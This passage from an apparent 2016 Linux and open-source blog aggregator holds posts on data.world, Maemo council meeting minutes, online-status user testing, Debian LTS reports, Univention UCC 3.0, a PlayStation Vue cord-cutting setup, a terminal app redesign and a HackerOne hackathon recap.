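claims = {"townA": 8, "townB": 25}      # insurance claims per town (hypothetical)

# Join the two datasets on their shared key (town), then derive a new metric.
claims_per_accident = {
    town: claims[town] / accidents[town]
    for town in accidents.keys() & claims.keys()
}
print(claims_per_accident)
```

The interesting discoveries usually come from exactly this step — a ratio, trend, or outlier that only appears once datasets are combined.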

Screen Shot 2016-08-15 at 3.36.10 AM

Many of these discoveries are hiding in plain sight. Sadly, while talented data scientists are able to pull together these different data sets, it is often hard and laborious work. Surely if we make this work easier, more accessible, consistent, and available to all we can speed up innovation and discovery?

Exactly.

As history has taught us, the right mixture of access, tooling, and community can have a tremendous impact. We have seen examples of this in open source (e.g. GitLab / GitHub), funding (e.g. Kickstarter / Indiegogo), and security (e.g. HackerOne).

data.world are doing this for data.

Data Science is Tough

There are four key areas where I think data.world can make a potent impact:

  1. Access – while there is lots of data in the world, access is inconsistent. Data is often spread across different sites, formats, and accessible to different people. We can bring this data together into a consistent platform, available to everyone.
  2. Preparation – much of the work data scientists perform is learning and prepping datasets for use. This work should be simplified, done once, and then shared with everyone, as opposed to being performed by each person who consumes the data.
  3. Collaboration – a lot of data science is fairly ad-hoc in how people work together. In much the same way open source has helped create common approaches for code, there is potential to do the same with data.
  4. Community – there is a great opportunity to build a diverse global community, not just of data scientists, but also organizations, charities, activists, and armchair sleuths who, armed with the right tools and expertise, could make many meaningful discoveries.

This is what data.world is building and I find the combination of access, platform, and network effects of data and community particularly exciting.

Unlocking Curiosity

If we look at the most profound impacts technology has had in recent years it is in bubbling people’s curiosity and creativity to the surface.

When we build community-based platforms that tap into this curiosity and creativity, we generate new ideas and approaches. New ideas and approaches then become the foundation for changing how the world thinks and operates.

screencapture-data-world-1471257465804

As one such example, open source tapped the curiosity and creativity of developers to produce a rich patchwork of software and tooling, but more importantly, a culture of openness and collaboration. While it is easy to see the software as the primary outcome, the impact of open source has been much deeper and impacted skills, education, career opportunities, business, collaboration, and more.

Enabling the same curiosity and creativity with the wealth of data we have in the world is going to be an exciting journey. Stay tuned.

The post Opening Up Data Science with data.world appeared first on Jono Bacon.

18 August, 2016 03:00PM

Ubuntu Podcast from the UK LoCo: S09E25 – Golden Keys - Ubuntu Podcast

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

18 August, 2016 02:00PM

hackergotchi for Maemo developers

Maemo developers

2016-07-26 Meeting Minutes

Meeting held 2016-07-26 on FreeNode, channel #maemo-meeting (logs)

Attending: pichlo, Win7Mac, eekkelund, reinob, juiceme

Partial: chem|st

Absent:

Summary of topics (ordered by discussion):

  • Topic Approve pending request on https://garage.maemo.org/admin/approve-pending.php
  • Topic Coding Competition
  • Topic Twitter account
  • Topic MC e.V.

(Topic Approve pending project request on https://garage.maemo.org/admin/approve-pending.php):

  • juiceme added Council to garage admin group
  • juiceme approved project request

(Topic Coding Competition):

  • Postponed CC by one month
  • Submitting an entry: "we could also set up an ftp site where we place whatever comes via mailing list, in case people prefer to download it like that" reinob could handle this

(Topic Twitter account):

  • Maemo community does not have twitter account
  • eekkelund will make one (Maemo Community, @maemo_org)

(Topic MC e.V.):

  • Choosing GA meeting dates
  • Court filings
  • Win7Mac & reinob will stand as candidates for the board

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:
    • Set up ftp/sftp site for CC (reinob)
    • Create twitter account for maemo community (eekkelund)

Solved Action Items:
Find out if https is doable

18 August, 2016 06:39AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-19 Meeting Minutes

Meeting held 2016-07-19 on FreeNode, channel #maemo-meeting (logs)

Attending: Win7Mac, eekkelund, reinob

Partial:

Absent: pichlo, juiceme

Summary of topics (ordered by discussion):

  • Topic Coding Competition

(Topic Coding Competition):

  • How to submit an entry? Thread to TMO/email
  • Categories discussion, dropped wishlist.
  • Updated the Wiki page

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:

Solved Action Items:
Find out if https is doable

18 August, 2016 06:38AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-12 Meeting Minutes

Meeting held 2016-07-12 on FreeNode, channel #maemo-meeting (logs)

Attending: eekkelund, pichlo, reinob

Partial:

Absent: Win7Mac, juiceme

Summary of topics (ordered by discussion):

  • Topic Coding Competition

(Topic Coding Competition):

  • Donations, board has PayPal and bank account
  • Timeframe discussion
  • Categories discussion, 3 main categories: Something new, Fixing/Updating and Beginner.
  • Rules discussion
  • eekkelund has edited wiki page

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:

Solved Action Items:
Find out if https is doable

18 August, 2016 06:36AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-05 Meeting Minutes

Meeting held 2016-07-05 on FreeNode, channel #maemo-meeting (logs)

Attending: juiceme, eekkelund, pichlo, Win7Mac, reinob

Partial:

Absent:

Summary of topics (ordered by discussion):

  • Topic read-only option for TOR endpoints
  • Topic Coding Competition

(Topic read-only option for TOR endpoints):

  • There is thread in TMO
  • maemo.org should have read-only option for tor endpoints
  • Or if TMO is set up as hidden service then read-write access should be OK

(Topic Coding Competition):

  • eekkelund will start to write wiki page
  • Board will handle the prizes/donations
  • Timeframe discussion
  • Platforms discussion
  • Categories discussion
  • Voting, same as in elections

Action Items:
  • old items:
    • The next GA meeting should be announced soon.
  • new items:
    • Coding competition planning (eekkelund)

Solved Action Items:
Find out if https is doable

18 August, 2016 06:35AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

hackergotchi for Ubuntu developers

Ubuntu developers

Lubuntu Blog: We need your input on Lubuntu image sizes!

The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is located here: http://lubuntu.me/cd-size-poll/ The poll closes on 26 August 2016 at […]

18 August, 2016 01:16AM

August 17, 2016

Canonical Design Team: What is the best way to display online status? We tested it

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering about the best way to display an online/offline status. Some of us thought text would be more explicit, but others thought it added more noise to the screen. We decided that we needed some real data in order to make the best decision.

Our user testing is usually done by a designated researcher, but their plates tend to be full and their projects bigger, so I decided to make my first foray into user testing myself. I got some tips from designers on our cloud team who had more experience with user testing: Maria Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: software engineer, very tech savvy and tech enthusiast.
  2. Magda: Our former PM and very familiar with our product and designs.
  3. Stefanie: Our Office Manager who knows our products but not so familiar with our designs.
  4. Rodney: Our IS Associate who is tech savvy but not familiar with our design work
  5. Ben: A copyeditor who has no background in tech or design and is a light phone user.
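The "5 people uncover up to 80% of usability issues" rule of thumb comes from a commonly cited usability model (Nielsen/Landauer), which assumes each tester independently hits a given problem with probability around 0.31. A quick sketch of the math:

```python
def problems_found(n_testers, p=0.31):
    """Expected share of usability problems uncovered by n testers,
    per the Nielsen/Landauer model: 1 - (1 - p)^n, where p is the
    chance a single tester encounters a given problem (~0.31)."""
    return 1 - (1 - p) ** n_testers

print(round(problems_found(5), 2))  # → 0.84, roughly the "80%" cited above
```

Diminishing returns set in quickly, which is why small, diverse panels like the one above are usually preferred over one large test round.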

The tool I decided to use was InVision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots vs text to represent online status, plus variations on placement. I then put these on my phone so my test subjects could interact with them and feel like they were looking at a full-fledged app, with the same expectations.

group_chat_testing

During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?” and “Is anything unclear?”. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to see what the testers noticed and brought up on their own, and what patterns arose.

My findings were as follows:

Online status: Text or Green Dot

Unanimously they all preferred online status to be depicted with colour and 4 out of 5 preferred the green dot rather than text because of its scannability.

Online status placement:

This one was close but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work, and I am looking forward to the next time, which will hopefully be bigger in scope.

group_chat_final

The finished design

17 August, 2016 03:57PM

Jono Bacon: Join My Reddit AMA – 30th August 2016 at 9am Pacific

On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will be doing a Reddit AMA about my work in community strategy, management, developer relations, open source, music, and elsewhere.

Screen Shot 2016-08-16 at 10.45.40 PM

For those unfamiliar with Reddit AMAs, it is essentially a way in which people can ask questions that someone will respond to. You simply add your questions (serious, or fun both welcome!) and I will respond to as many as I can.

It has been a while since my last AMA, so I am looking forward to this one.

Feel free to ask any questions you like, and this could include questions that relate to:

  • Community management, leadership, and best practice.
  • Working at Canonical, GitHub, XPRIZE, and elsewhere.
  • The open source industry, how it has changed, and what the future looks like.
  • The projects I have been involved in such as Ubuntu, GNOME, KDE, and others.
  • The driving forces behind people and groups, behavioral economics, etc.
  • My other things such as my music, conferences, writing etc.
  • Anything else – politics, movies, news, tech…ask away!

If you want to ask about something else though, go ahead! 🙂

How to Join

Joining the AMA is simple. Just follow these steps:

  • Be sure to have a Reddit account. If you don’t have one, head over here and sign up.
  • On Tuesday 30th August 2016 at 9am Pacific (see other time zone times here) I will share the link to my AMA on Twitter (I am not allowed to share it until we run the AMA). You can look for this tweet by clicking here.
  • Click the link in my tweet to go to the AMA and then click the text box to add your question(s).
  • Now just wait until I respond. Feel free to follow up, challenge my response, and otherwise have fun!

Simple as that. 🙂

A Bit of Background

For those of you unfamiliar with my work, you can read more here, but here is a quick summary:

  • I run a community strategy/management and developer relations consultancy practice.
  • My clients include Deutsche Bank, HackerOne, data.world, Intel, Sony Mobile, Open Networking Foundation, and others.
  • I previously served as director of community for GitHub, Canonical, and XPRIZE.
  • I serve as an advisor to various organizations including Open Networking Foundation, Mycroft AI, Mod Duo, and Open Cloud Consortium.
  • I wrote The Art of Community and have columns for Forbes and opensource.com. I have also written four other books and hundreds of articles.
  • I have been involved with various open source projects including Ubuntu, GNOME, KDE, Jokosher, and others.
  • I am an active podcaster, previously with LugRadio and Shot of Jaq, and now with Bad Voltage.
  • I am really into music and have played in Seraphidian and Severed Fifth.

So, I hope you manage to make it over to the AMA, ask some fun and interesting questions, and we can have a good time. Thanks!

The post Join My Reddit AMA – 30th August 2016 at 9am Pacific appeared first on Jono Bacon.

17 August, 2016 03:00PM

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, July 2016

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 hours extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.
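The bookkeeping in the list above follows one simple rule: hours allocated but not worked in a month are kept as extra hours for the next month. A trivial sketch (function name mine):

```python
def carry_over(allocated, done):
    """Hours left over this month, kept for next month's allocation."""
    return round(allocated - done, 2)

print(carry_over(14.7, 14))  # → 0.7, e.g. Chris Lamb's case above
print(carry_over(14.7, 13))  # → 1.7, e.g. Emilio's case above
```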

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! Our funding goal is getting closer but it’s not there yet.

The security tracker currently lists 22 packages with a known CVE and the dla-needed.txt file likewise. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.

2 comments | Liked this article? Click here. | My blog is Flattr-enabled.

17 August, 2016 02:45PM

Raphaël Hertzog: My Free Software Activities in July 2016

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoF. You can find the slides and the videos in the links of their corresponding page:

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects) but discussed it with many people during the week, and it looks like the project has evolved quite a bit in the last 10 years: while it’s still a sensitive topic (and rightfully so, given the possible impacts), people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured the reverse build dependencies still build, and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I got and that made me look at the package… last time I looked, upstream had disappeared (the upstream URL was even gone), but it seems he has become active again and pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.
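For readers unfamiliar with the mechanism in that last item: APT only lets a dependency written as `foo:any` be satisfied by any architecture's build of `foo` if the target package itself opts in with a `Multi-Arch: allowed` field — which is what #832501 requests for firefox-esr. Schematically (illustrative control-file fragment, not the actual Debian packaging):

```
Package: firefox-esr
Multi-Arch: allowed
```

A depending package can then declare `Depends: firefox-esr:any`; without the `Multi-Arch: allowed` marker, dpkg and APT reject the `:any` qualifier, which is the counter-productive behaviour #832503 describes.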

Thanks

See you next month for a new summary of my activities.

3 comments | Liked this article? Click here. | My blog is Flattr-enabled.

17 August, 2016 10:53AM

hackergotchi for Univention Corporate Server

Univention Corporate Server

UCC 3.0 released: Switch from Kubuntu to Ubuntu

This week we published version 3.0 of Univention Corporate Client (UCC), our desktop solution for the operation and administration of PCs, notebooks and thin clients. An essential change compared to previous releases is the switch of the technical basis from Kubuntu to Ubuntu. Our reason for this switch was that Ubuntu offers longer support terms (5 years) for its Long Term Support (LTS) versions, whereas Kubuntu 16.04 LTS is only supported for 3 years. Customers thus profit from long-term support for UCC. With this switch the desktop environment also changed from KDE to Unity, which was developed especially for Ubuntu by Canonical. To provide a better overview of all UCC images installed in an environment, all currently installed client images are now reported to Univention Corporate Server (UCS). As UCS is the central identity management system for UCC, these images are then displayed for easy search in UCS.

Ubuntu Logo
UCC 3.0 is available as a desktop image and a thin client image. The thin client version continues to be available in 32 and 64 bit versions, while the desktop image of UCC is only available as a 64 bit version. Univention thus adapts its product strategy to changed user behaviour, as mostly 64 bit desktops are requested nowadays.

Some of the new features were originally developed for individual customers and increase convenience significantly. These include, among other features, the option to define device names which should not be embedded automatically into the system, as would usually be the case; this improves compatibility with „exotic hardware“. In addition, the policies defined on a server are now saved locally with each start of UCC, so they still exist even if a client is temporarily disconnected from the central LDAP server. Furthermore, clients can recognise interim changes of their position in the LDAP directory and therefore do not need to rejoin the domain.

One further practical extension: administrators can now temporarily add write rights to a running UCC read-only image in order to carry out system changes which persist even after the system has rebooted back into read-only mode. The Home-Mounter tool for mounting network drives via CIFS was removed; instead, interfaces have been created in UCC 3.0 which can be accessed by external tools.

Univention Corporate Client can be administrated via the web-based Univention Management Console (UMC) of Univention Corporate Server. It comes with integrated user and authorization management for policies and desktop profiles. Through automated software distribution and the option to organize desktops in a directory tree, administrative effort is reduced. UCC is deployed especially in larger organizations and the educational sector as a cost-efficient client solution.

You may find further information about UCC in the release notes or on the product website.

The post UCC 3.0 released: Switch from Kubuntu to Ubuntu appeared first on Univention.

17 August, 2016 09:14AM by Alice Horstmann

August 16, 2016


Ubuntu developers

Jono Bacon: Cutting the Cord With Playstation Vue

We just cut the cord, and glory is ours. I thought I would share how we did it to provide food for thought for those of you sick of cable (and maybe so people can stop bickering on my DirecTV blog post from years back).


I will walk through the requirements we had, what we used to have, and what the new setup looks like.

Requirements

The requirements for us are fairly simple:

  • We want access to a core set of channels:
    • Comedy Central
    • CNN
    • Food Network
    • HGTV
    • Local Channels (e.g. CBS, NBC, ABC).
  • Be able to favorite shows and replay them after they have aired.
  • Have access to streaming channels/services:
    • Amazon Prime
    • Netflix
    • Crackle
    • Spotify
    • Pandora
  • Be able to play Blu-ray discs, DVDs, and other optical content. While we rarely do this, we want the option.
  • Have a reliable Internet connection and uninterrupted service.
  • Have all of this both in our living room and in our bedroom.
  • Reduce our costs.
  • Bonus: access some channels on mobile devices. Sometimes I would like to watch The Daily Show or the news on my tablet while on the elliptical.

Previous Setup

Our previous setup had most of these requirements in place.

For TV we were with DirecTV. We had all of the channels that we needed and we could record TV downstairs but also replay it upstairs in the bedroom.

We have a Roku that provides the streaming channels (Netflix, Amazon Prime, Crackle, Spotify, and Pandora).

We also have a cheap Blu-ray player which, while rarely used, does come in handy from time to time.

Everything goes into a Pioneer Elite amp. I tried to consolidate the remotes with a Logitech Harmony, but it broke immediately and I have heard from others that the quality is awful. As such, we used a cheaper all-in-one remote which could do everything except the Roku, as that is Bluetooth.

The New Setup

At the core of our new setup is a Playstation 4. I have actually had this for a while, but it had been sitting up in my office, barely used.


The Playstation 4 provides the bulk of what we need:

  • Amazon Prime, Netflix, and Spotify. I haven’t found a Pandora app yet, but this is fine.
  • Blu-ray playback.
  • Obviously we have the additional benefit of now being able to play games downstairs. I am enjoying having a blast on Battlefield from time to time and I installed some simple games for Jack to play on.

For the TV we are using Playstation Vue. This is a streaming service that has the most comprehensive set of channels I have seen so far, and the bulk of what we wanted is in the lowest tier plan ($40/month). I had assessed some other services but key channels (e.g. Comedy Central) were missing.


Playstation Vue has some nice features:

  • It is a lot cheaper. Our $80+/month cable bill has now gone down to $40/month with Vue.
  • The overall experience (e.g. browsing the guide, selecting shows, viewing information) is far quicker, more modern, and smoother than the clunky old DirecTV box.
  • When browsing the guide you can watch not just live TV but also previous shows that have aired. For example, missed The Daily Show this week? No worries, you can just go back and watch it.
  • Playstation Vue is also available on Android, iOS, Roku and other devices, which means I can watch TV and play back shows wherever I am.

In terms of the remote control, I bought the official Playstation 4 remote and it works pretty well. It is still a little clunky in some areas, as the apps on the Playstation sometimes refer to the usual Playstation buttons as opposed to the buttons on the remote. Overall though it works great and it also powers my other devices (e.g. TV and amp), although I couldn’t get volume pass-through working.

Networking wise, we have a router upstairs in the bedroom, which is where the feed comes in. I then take a cable from it and send it over our power lines with an Ethernet-over-Power adapter. Downstairs I have an additional chained router, and I take ethernet from that router to the Playstation. This results in considerably more reliable performance than using wireless, which is a big improvement as the Roku doesn’t have an ethernet port.

In Conclusion

Overall, we love the new setup. The Playstation 4 is a great center-point for our entertainment system. It is awesome having a single remote, everything on one box and in one interface. I also love the higher-fidelity experience – the Roku is great but the interface looks a little dated and the apps are rather restricted.

Playstation Vue is absolutely awesome and I would highly recommend it for people looking to ditch cable. You don’t even need a Playstation 4 – you can use it on a Roku, for example.

I also love that we are future proofed. I am planning on getting Playstation VR, which will now work downstairs, and Sony are bringing more and more content and apps to the Playstation Store. For example, there are lots of movies, TV shows, and other content which may not be available elsewhere.

I would love to hear your stories though about your cord cutting. Which services and products did you move to? What do you think about a games console running your entertainment setup? What am I doing wrong? Let me know in the comments!

The post Cutting the Cord With Playstation Vue appeared first on Jono Bacon.

16 August, 2016 09:27PM

Ubuntu Insights: Intel® Joule™ board powered by Ubuntu Core


We’re happy to welcome a new development board to the Ubuntu family! The new Intel® Joule™ is a powerful board targeted at IoT and robotics makers, and it runs Ubuntu for a smooth development experience. It’s also affordable and compact enough to be used in deployment, so Ubuntu Core can be installed to make any device it’s included in secure and up to date … wherever it is!

Check out this Robot Demo that was filmed pre-IDF – The Turtlebot runs ROS on Ubuntu using the Intel® Joule™ board and Realsense camera.

Ubuntu Core, also known as Snappy, is a stripped down version of Ubuntu, designed to run securely on autonomous machines, devices and other internet-connected digital things. From homes to drones, these devices are set to revolutionise many aspects of our lives, but they need an operating system that is different from that of traditional PCs. Learn more about Ubuntu Core here.

Get involved in contributing to Ubuntu Core here.

16 August, 2016 07:06PM

Ubuntu Insights: Advantech and Canonical Form Strategic Partnership for IoT Gateways


Ubuntu Core operating system provides production ready platform for gateways.

London, UK – August 16, 2016 – Canonical today announced it has formed a strategic partnership with Advantech to work together to certify the company’s Internet of Things (IoT) gateways for Ubuntu Core.

The partnership ensures users of Advantech’s selected Intel x86-based IoT gateways are certified to have a fully functioning and supported Ubuntu image for their gateway. Users will also have access to an Ubuntu image and developer tools to ready their devices for production, as well as a number of services to fully manage their device’s security and software.

“We are extremely pleased to be forming this strategic partnership with Advantech, one of the world’s leaders in providing trusted innovative embedded and automation products and solutions,” said Jon Melamut, vice president of commercial devices operations for Canonical. “This partnership confirms Ubuntu Core as the operating system of choice for IoT developers and systems integrators who want to deploy products to market quickly. Ubuntu Core is Ubuntu for IoT and it provides, among other things, a production ready operating system for IoT gateways.”

“Advantech aims to provide a full range of IoT gateways with pre-integrated software to fulfill the needs of diverse IoT applications. We are very pleased with our collaboration with Canonical and the expansion of our operating system offerings. This collaboration will enable us to satisfy even more customer requirements and deliver an integrated, pre-validated, and flexible open-computing gateway platform that allows fast solution development and deployment,” said Miller Chang, vice president of Advantech Embedded Computing Group.

Canonical is the company behind Ubuntu, the world’s most popular open-source platform, while Advantech is the leader in providing trusted innovative embedded and automation products and solutions.

For more information on Ubuntu Core, please visit here.

About Canonical
Canonical is the company behind Ubuntu, the leading Operating System for cloud and the Internet of Things. Most public cloud workloads are running Ubuntu, and most new smart gateways, self-driving cars and advanced humanoid robots are running Ubuntu as well. Canonical provides enterprise support and services for commercial users of Ubuntu.

Canonical leads the development of the snap universal Linux packaging system for secure, transactional device updates and app stores. Ubuntu Core is an all-snap OS, perfect for devices and appliances. Established in 2004, Canonical is a privately held company.

About Advantech
Founded in 1983, Advantech is a leader in providing trusted, innovative products, services, and solutions. Advantech offers comprehensive system integration, hardware, software, customer-centric design services, embedded systems, automation products, and global logistics support. We cooperate closely with our partners to help provide complete solutions for a wide array of applications across a diverse range of industries. Our mission is to enable an intelligent planet with Automation and Embedded Computing products and solutions that empower the development of smarter working and living. With Advantech, there is no limit to the applications and innovations our products make possible. Advantech is a premier member of the Intel® Internet of Things Solutions Alliance. From modular components to market-ready systems, Intel and the 350+ global member companies of the Alliance provide scalable, interoperable solutions that accelerate deployment of intelligent devices and end-to-end analytics. Close collaboration with Intel and each other enables Alliance members to innovate with the latest technologies, helping developers deliver first-in-market solutions. (Corporate Website: www.advantech.com).

16 August, 2016 01:26PM

August 15, 2016

The Fridge: Ubuntu Weekly Newsletter Issue 478

Welcome to the Ubuntu Weekly Newsletter. This is issue #478 for the week August 8 – 14, 2016, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Paul White
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

15 August, 2016 09:22PM

Canonical Design Team: Convergent terminal

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

-Keyboard shortcuts
-Ability to completely customise touch/keyboard shortcuts
-Ability to split the screen horizontally/vertically (similar to Terminator)
-Ability to easily customise the palette colours, and window transparency (on desktop)
-Unlimited history/scrollback
-Adding a “find” action for searching the history

[Design mockup: terminal on the desktop]

Tabs and split screen

On larger screens tabs will be visually persistent. In addition it’s desirable to be able to split a panel horizontally and vertically, and to move between panels using keyboard shortcuts or by focusing with mouse/touch.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.

[Design mockup: terminal on the phone]

Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate future. In the interim, modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to order these shortcuts by recency, and add the ability to define your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.

[Design mockup]

More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.
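As an illustration only, a theme file in such a JSON format might look something like this (the keys are purely hypothetical, since the actual format has not been decided; the colour values are taken from the Solarized palette mentioned above):

```json
{
  "name": "My Solarized Variant",
  "background": "#002b36",
  "foreground": "#839496",
  "transparency": 0.9,
  "palette": [
    "#073642", "#dc322f", "#859900", "#b58900",
    "#268bd2", "#d33682", "#2aa198", "#eee8d5"
  ]
}
```

An in-app colour picker could then read and write the same file, so hand-edited and imported themes would stay interchangeable.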

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

15 August, 2016 04:24PM

Jonathan Riddell: Neon News: Frameworks 5.25, Kontact in Dev Editions, Maui bases on Neon

Things move fast in the land of Neon light.

Today KDE Frameworks 5.25 was added to the Neon User edition. KDE’s collection of Qt add-on libraries is released every month, and this update comes with a bunch of fixes.

Finally, Kontact has built in the Developer Editions. Apologies to those who had a half-installed build for a while; you should now be able to install all of KDE PIM and get your e-mail/calendar/notes/feed reader/a load of other bits. Suggestions are now being taken for what I should add next to Neon builds.

And in free software you are nobody until somebody bases their project off yours.  Yesterday Maui Linux released its new version based off KDE neon.  Maui was previously the distro used for Hawaii Qt Desktop but now it’s Plasma all the way and comes from the Netrunner team with a bunch of customisations for those who don’t appreciate Neon’s minimalist default install.

Maui Linux based off Neon

15 August, 2016 03:41PM

Jono Bacon: Running a Hackathon for Security Hackers

A few weeks ago I flew out to Las Vegas with HackerOne to help run an event we had been working on for a while called H1-702. It was a hackathon designed for some of the world’s most talented security hackers.

H1-702 was one piece in a picture to ensure HackerOne is the very best platform and community for hackers to hack, learn, and grow.

This was the event that we invited the cream of the crop to…hackers who have been doing significant and sustained work and who have delivered some awesome vulnerability reports.


Hacking For Fun and Profit

For the event we booked an MGM Grand Skyloft for three evenings. We invited the most prolific hackers on HackerOne to join us, where they would hack on a specific company’s technology each night. They didn’t learn which company it was until the evening they arrived…this kept a bit of mystery in the air. 😉

The first night had Zenefits, the second Snapchat, and the third Panasonic Avionics. This was a nice mixture of web, mobile, and embedded.


Each evening hackers were provided with the scope and then invited to hack these different products and submit vulnerabilities. Each company had their security team and developers on hand, able to answer questions and to review and confirm reports quickly (and then fix the issues).

Confirmed reports would result in a payout from the company and reputation points. This would then bump the hacker higher up on the H1-702 leaderboard and closer to winning the prestige of H1-702 Most Valued Hacker, complete with a pretty badass winners belt. As you can imagine, things got a little competitive. 😉


Each evening kicked off at around 7pm – 8pm and ran until the wee hours. The first night, for example, I ended up heading to bed at around 5.30am and they were still going.

There was an awesome electricity in the air and these hackers really brought their A-game. Lots of hackers walked out the door having made thousands of dollars for an evening’s hacking.

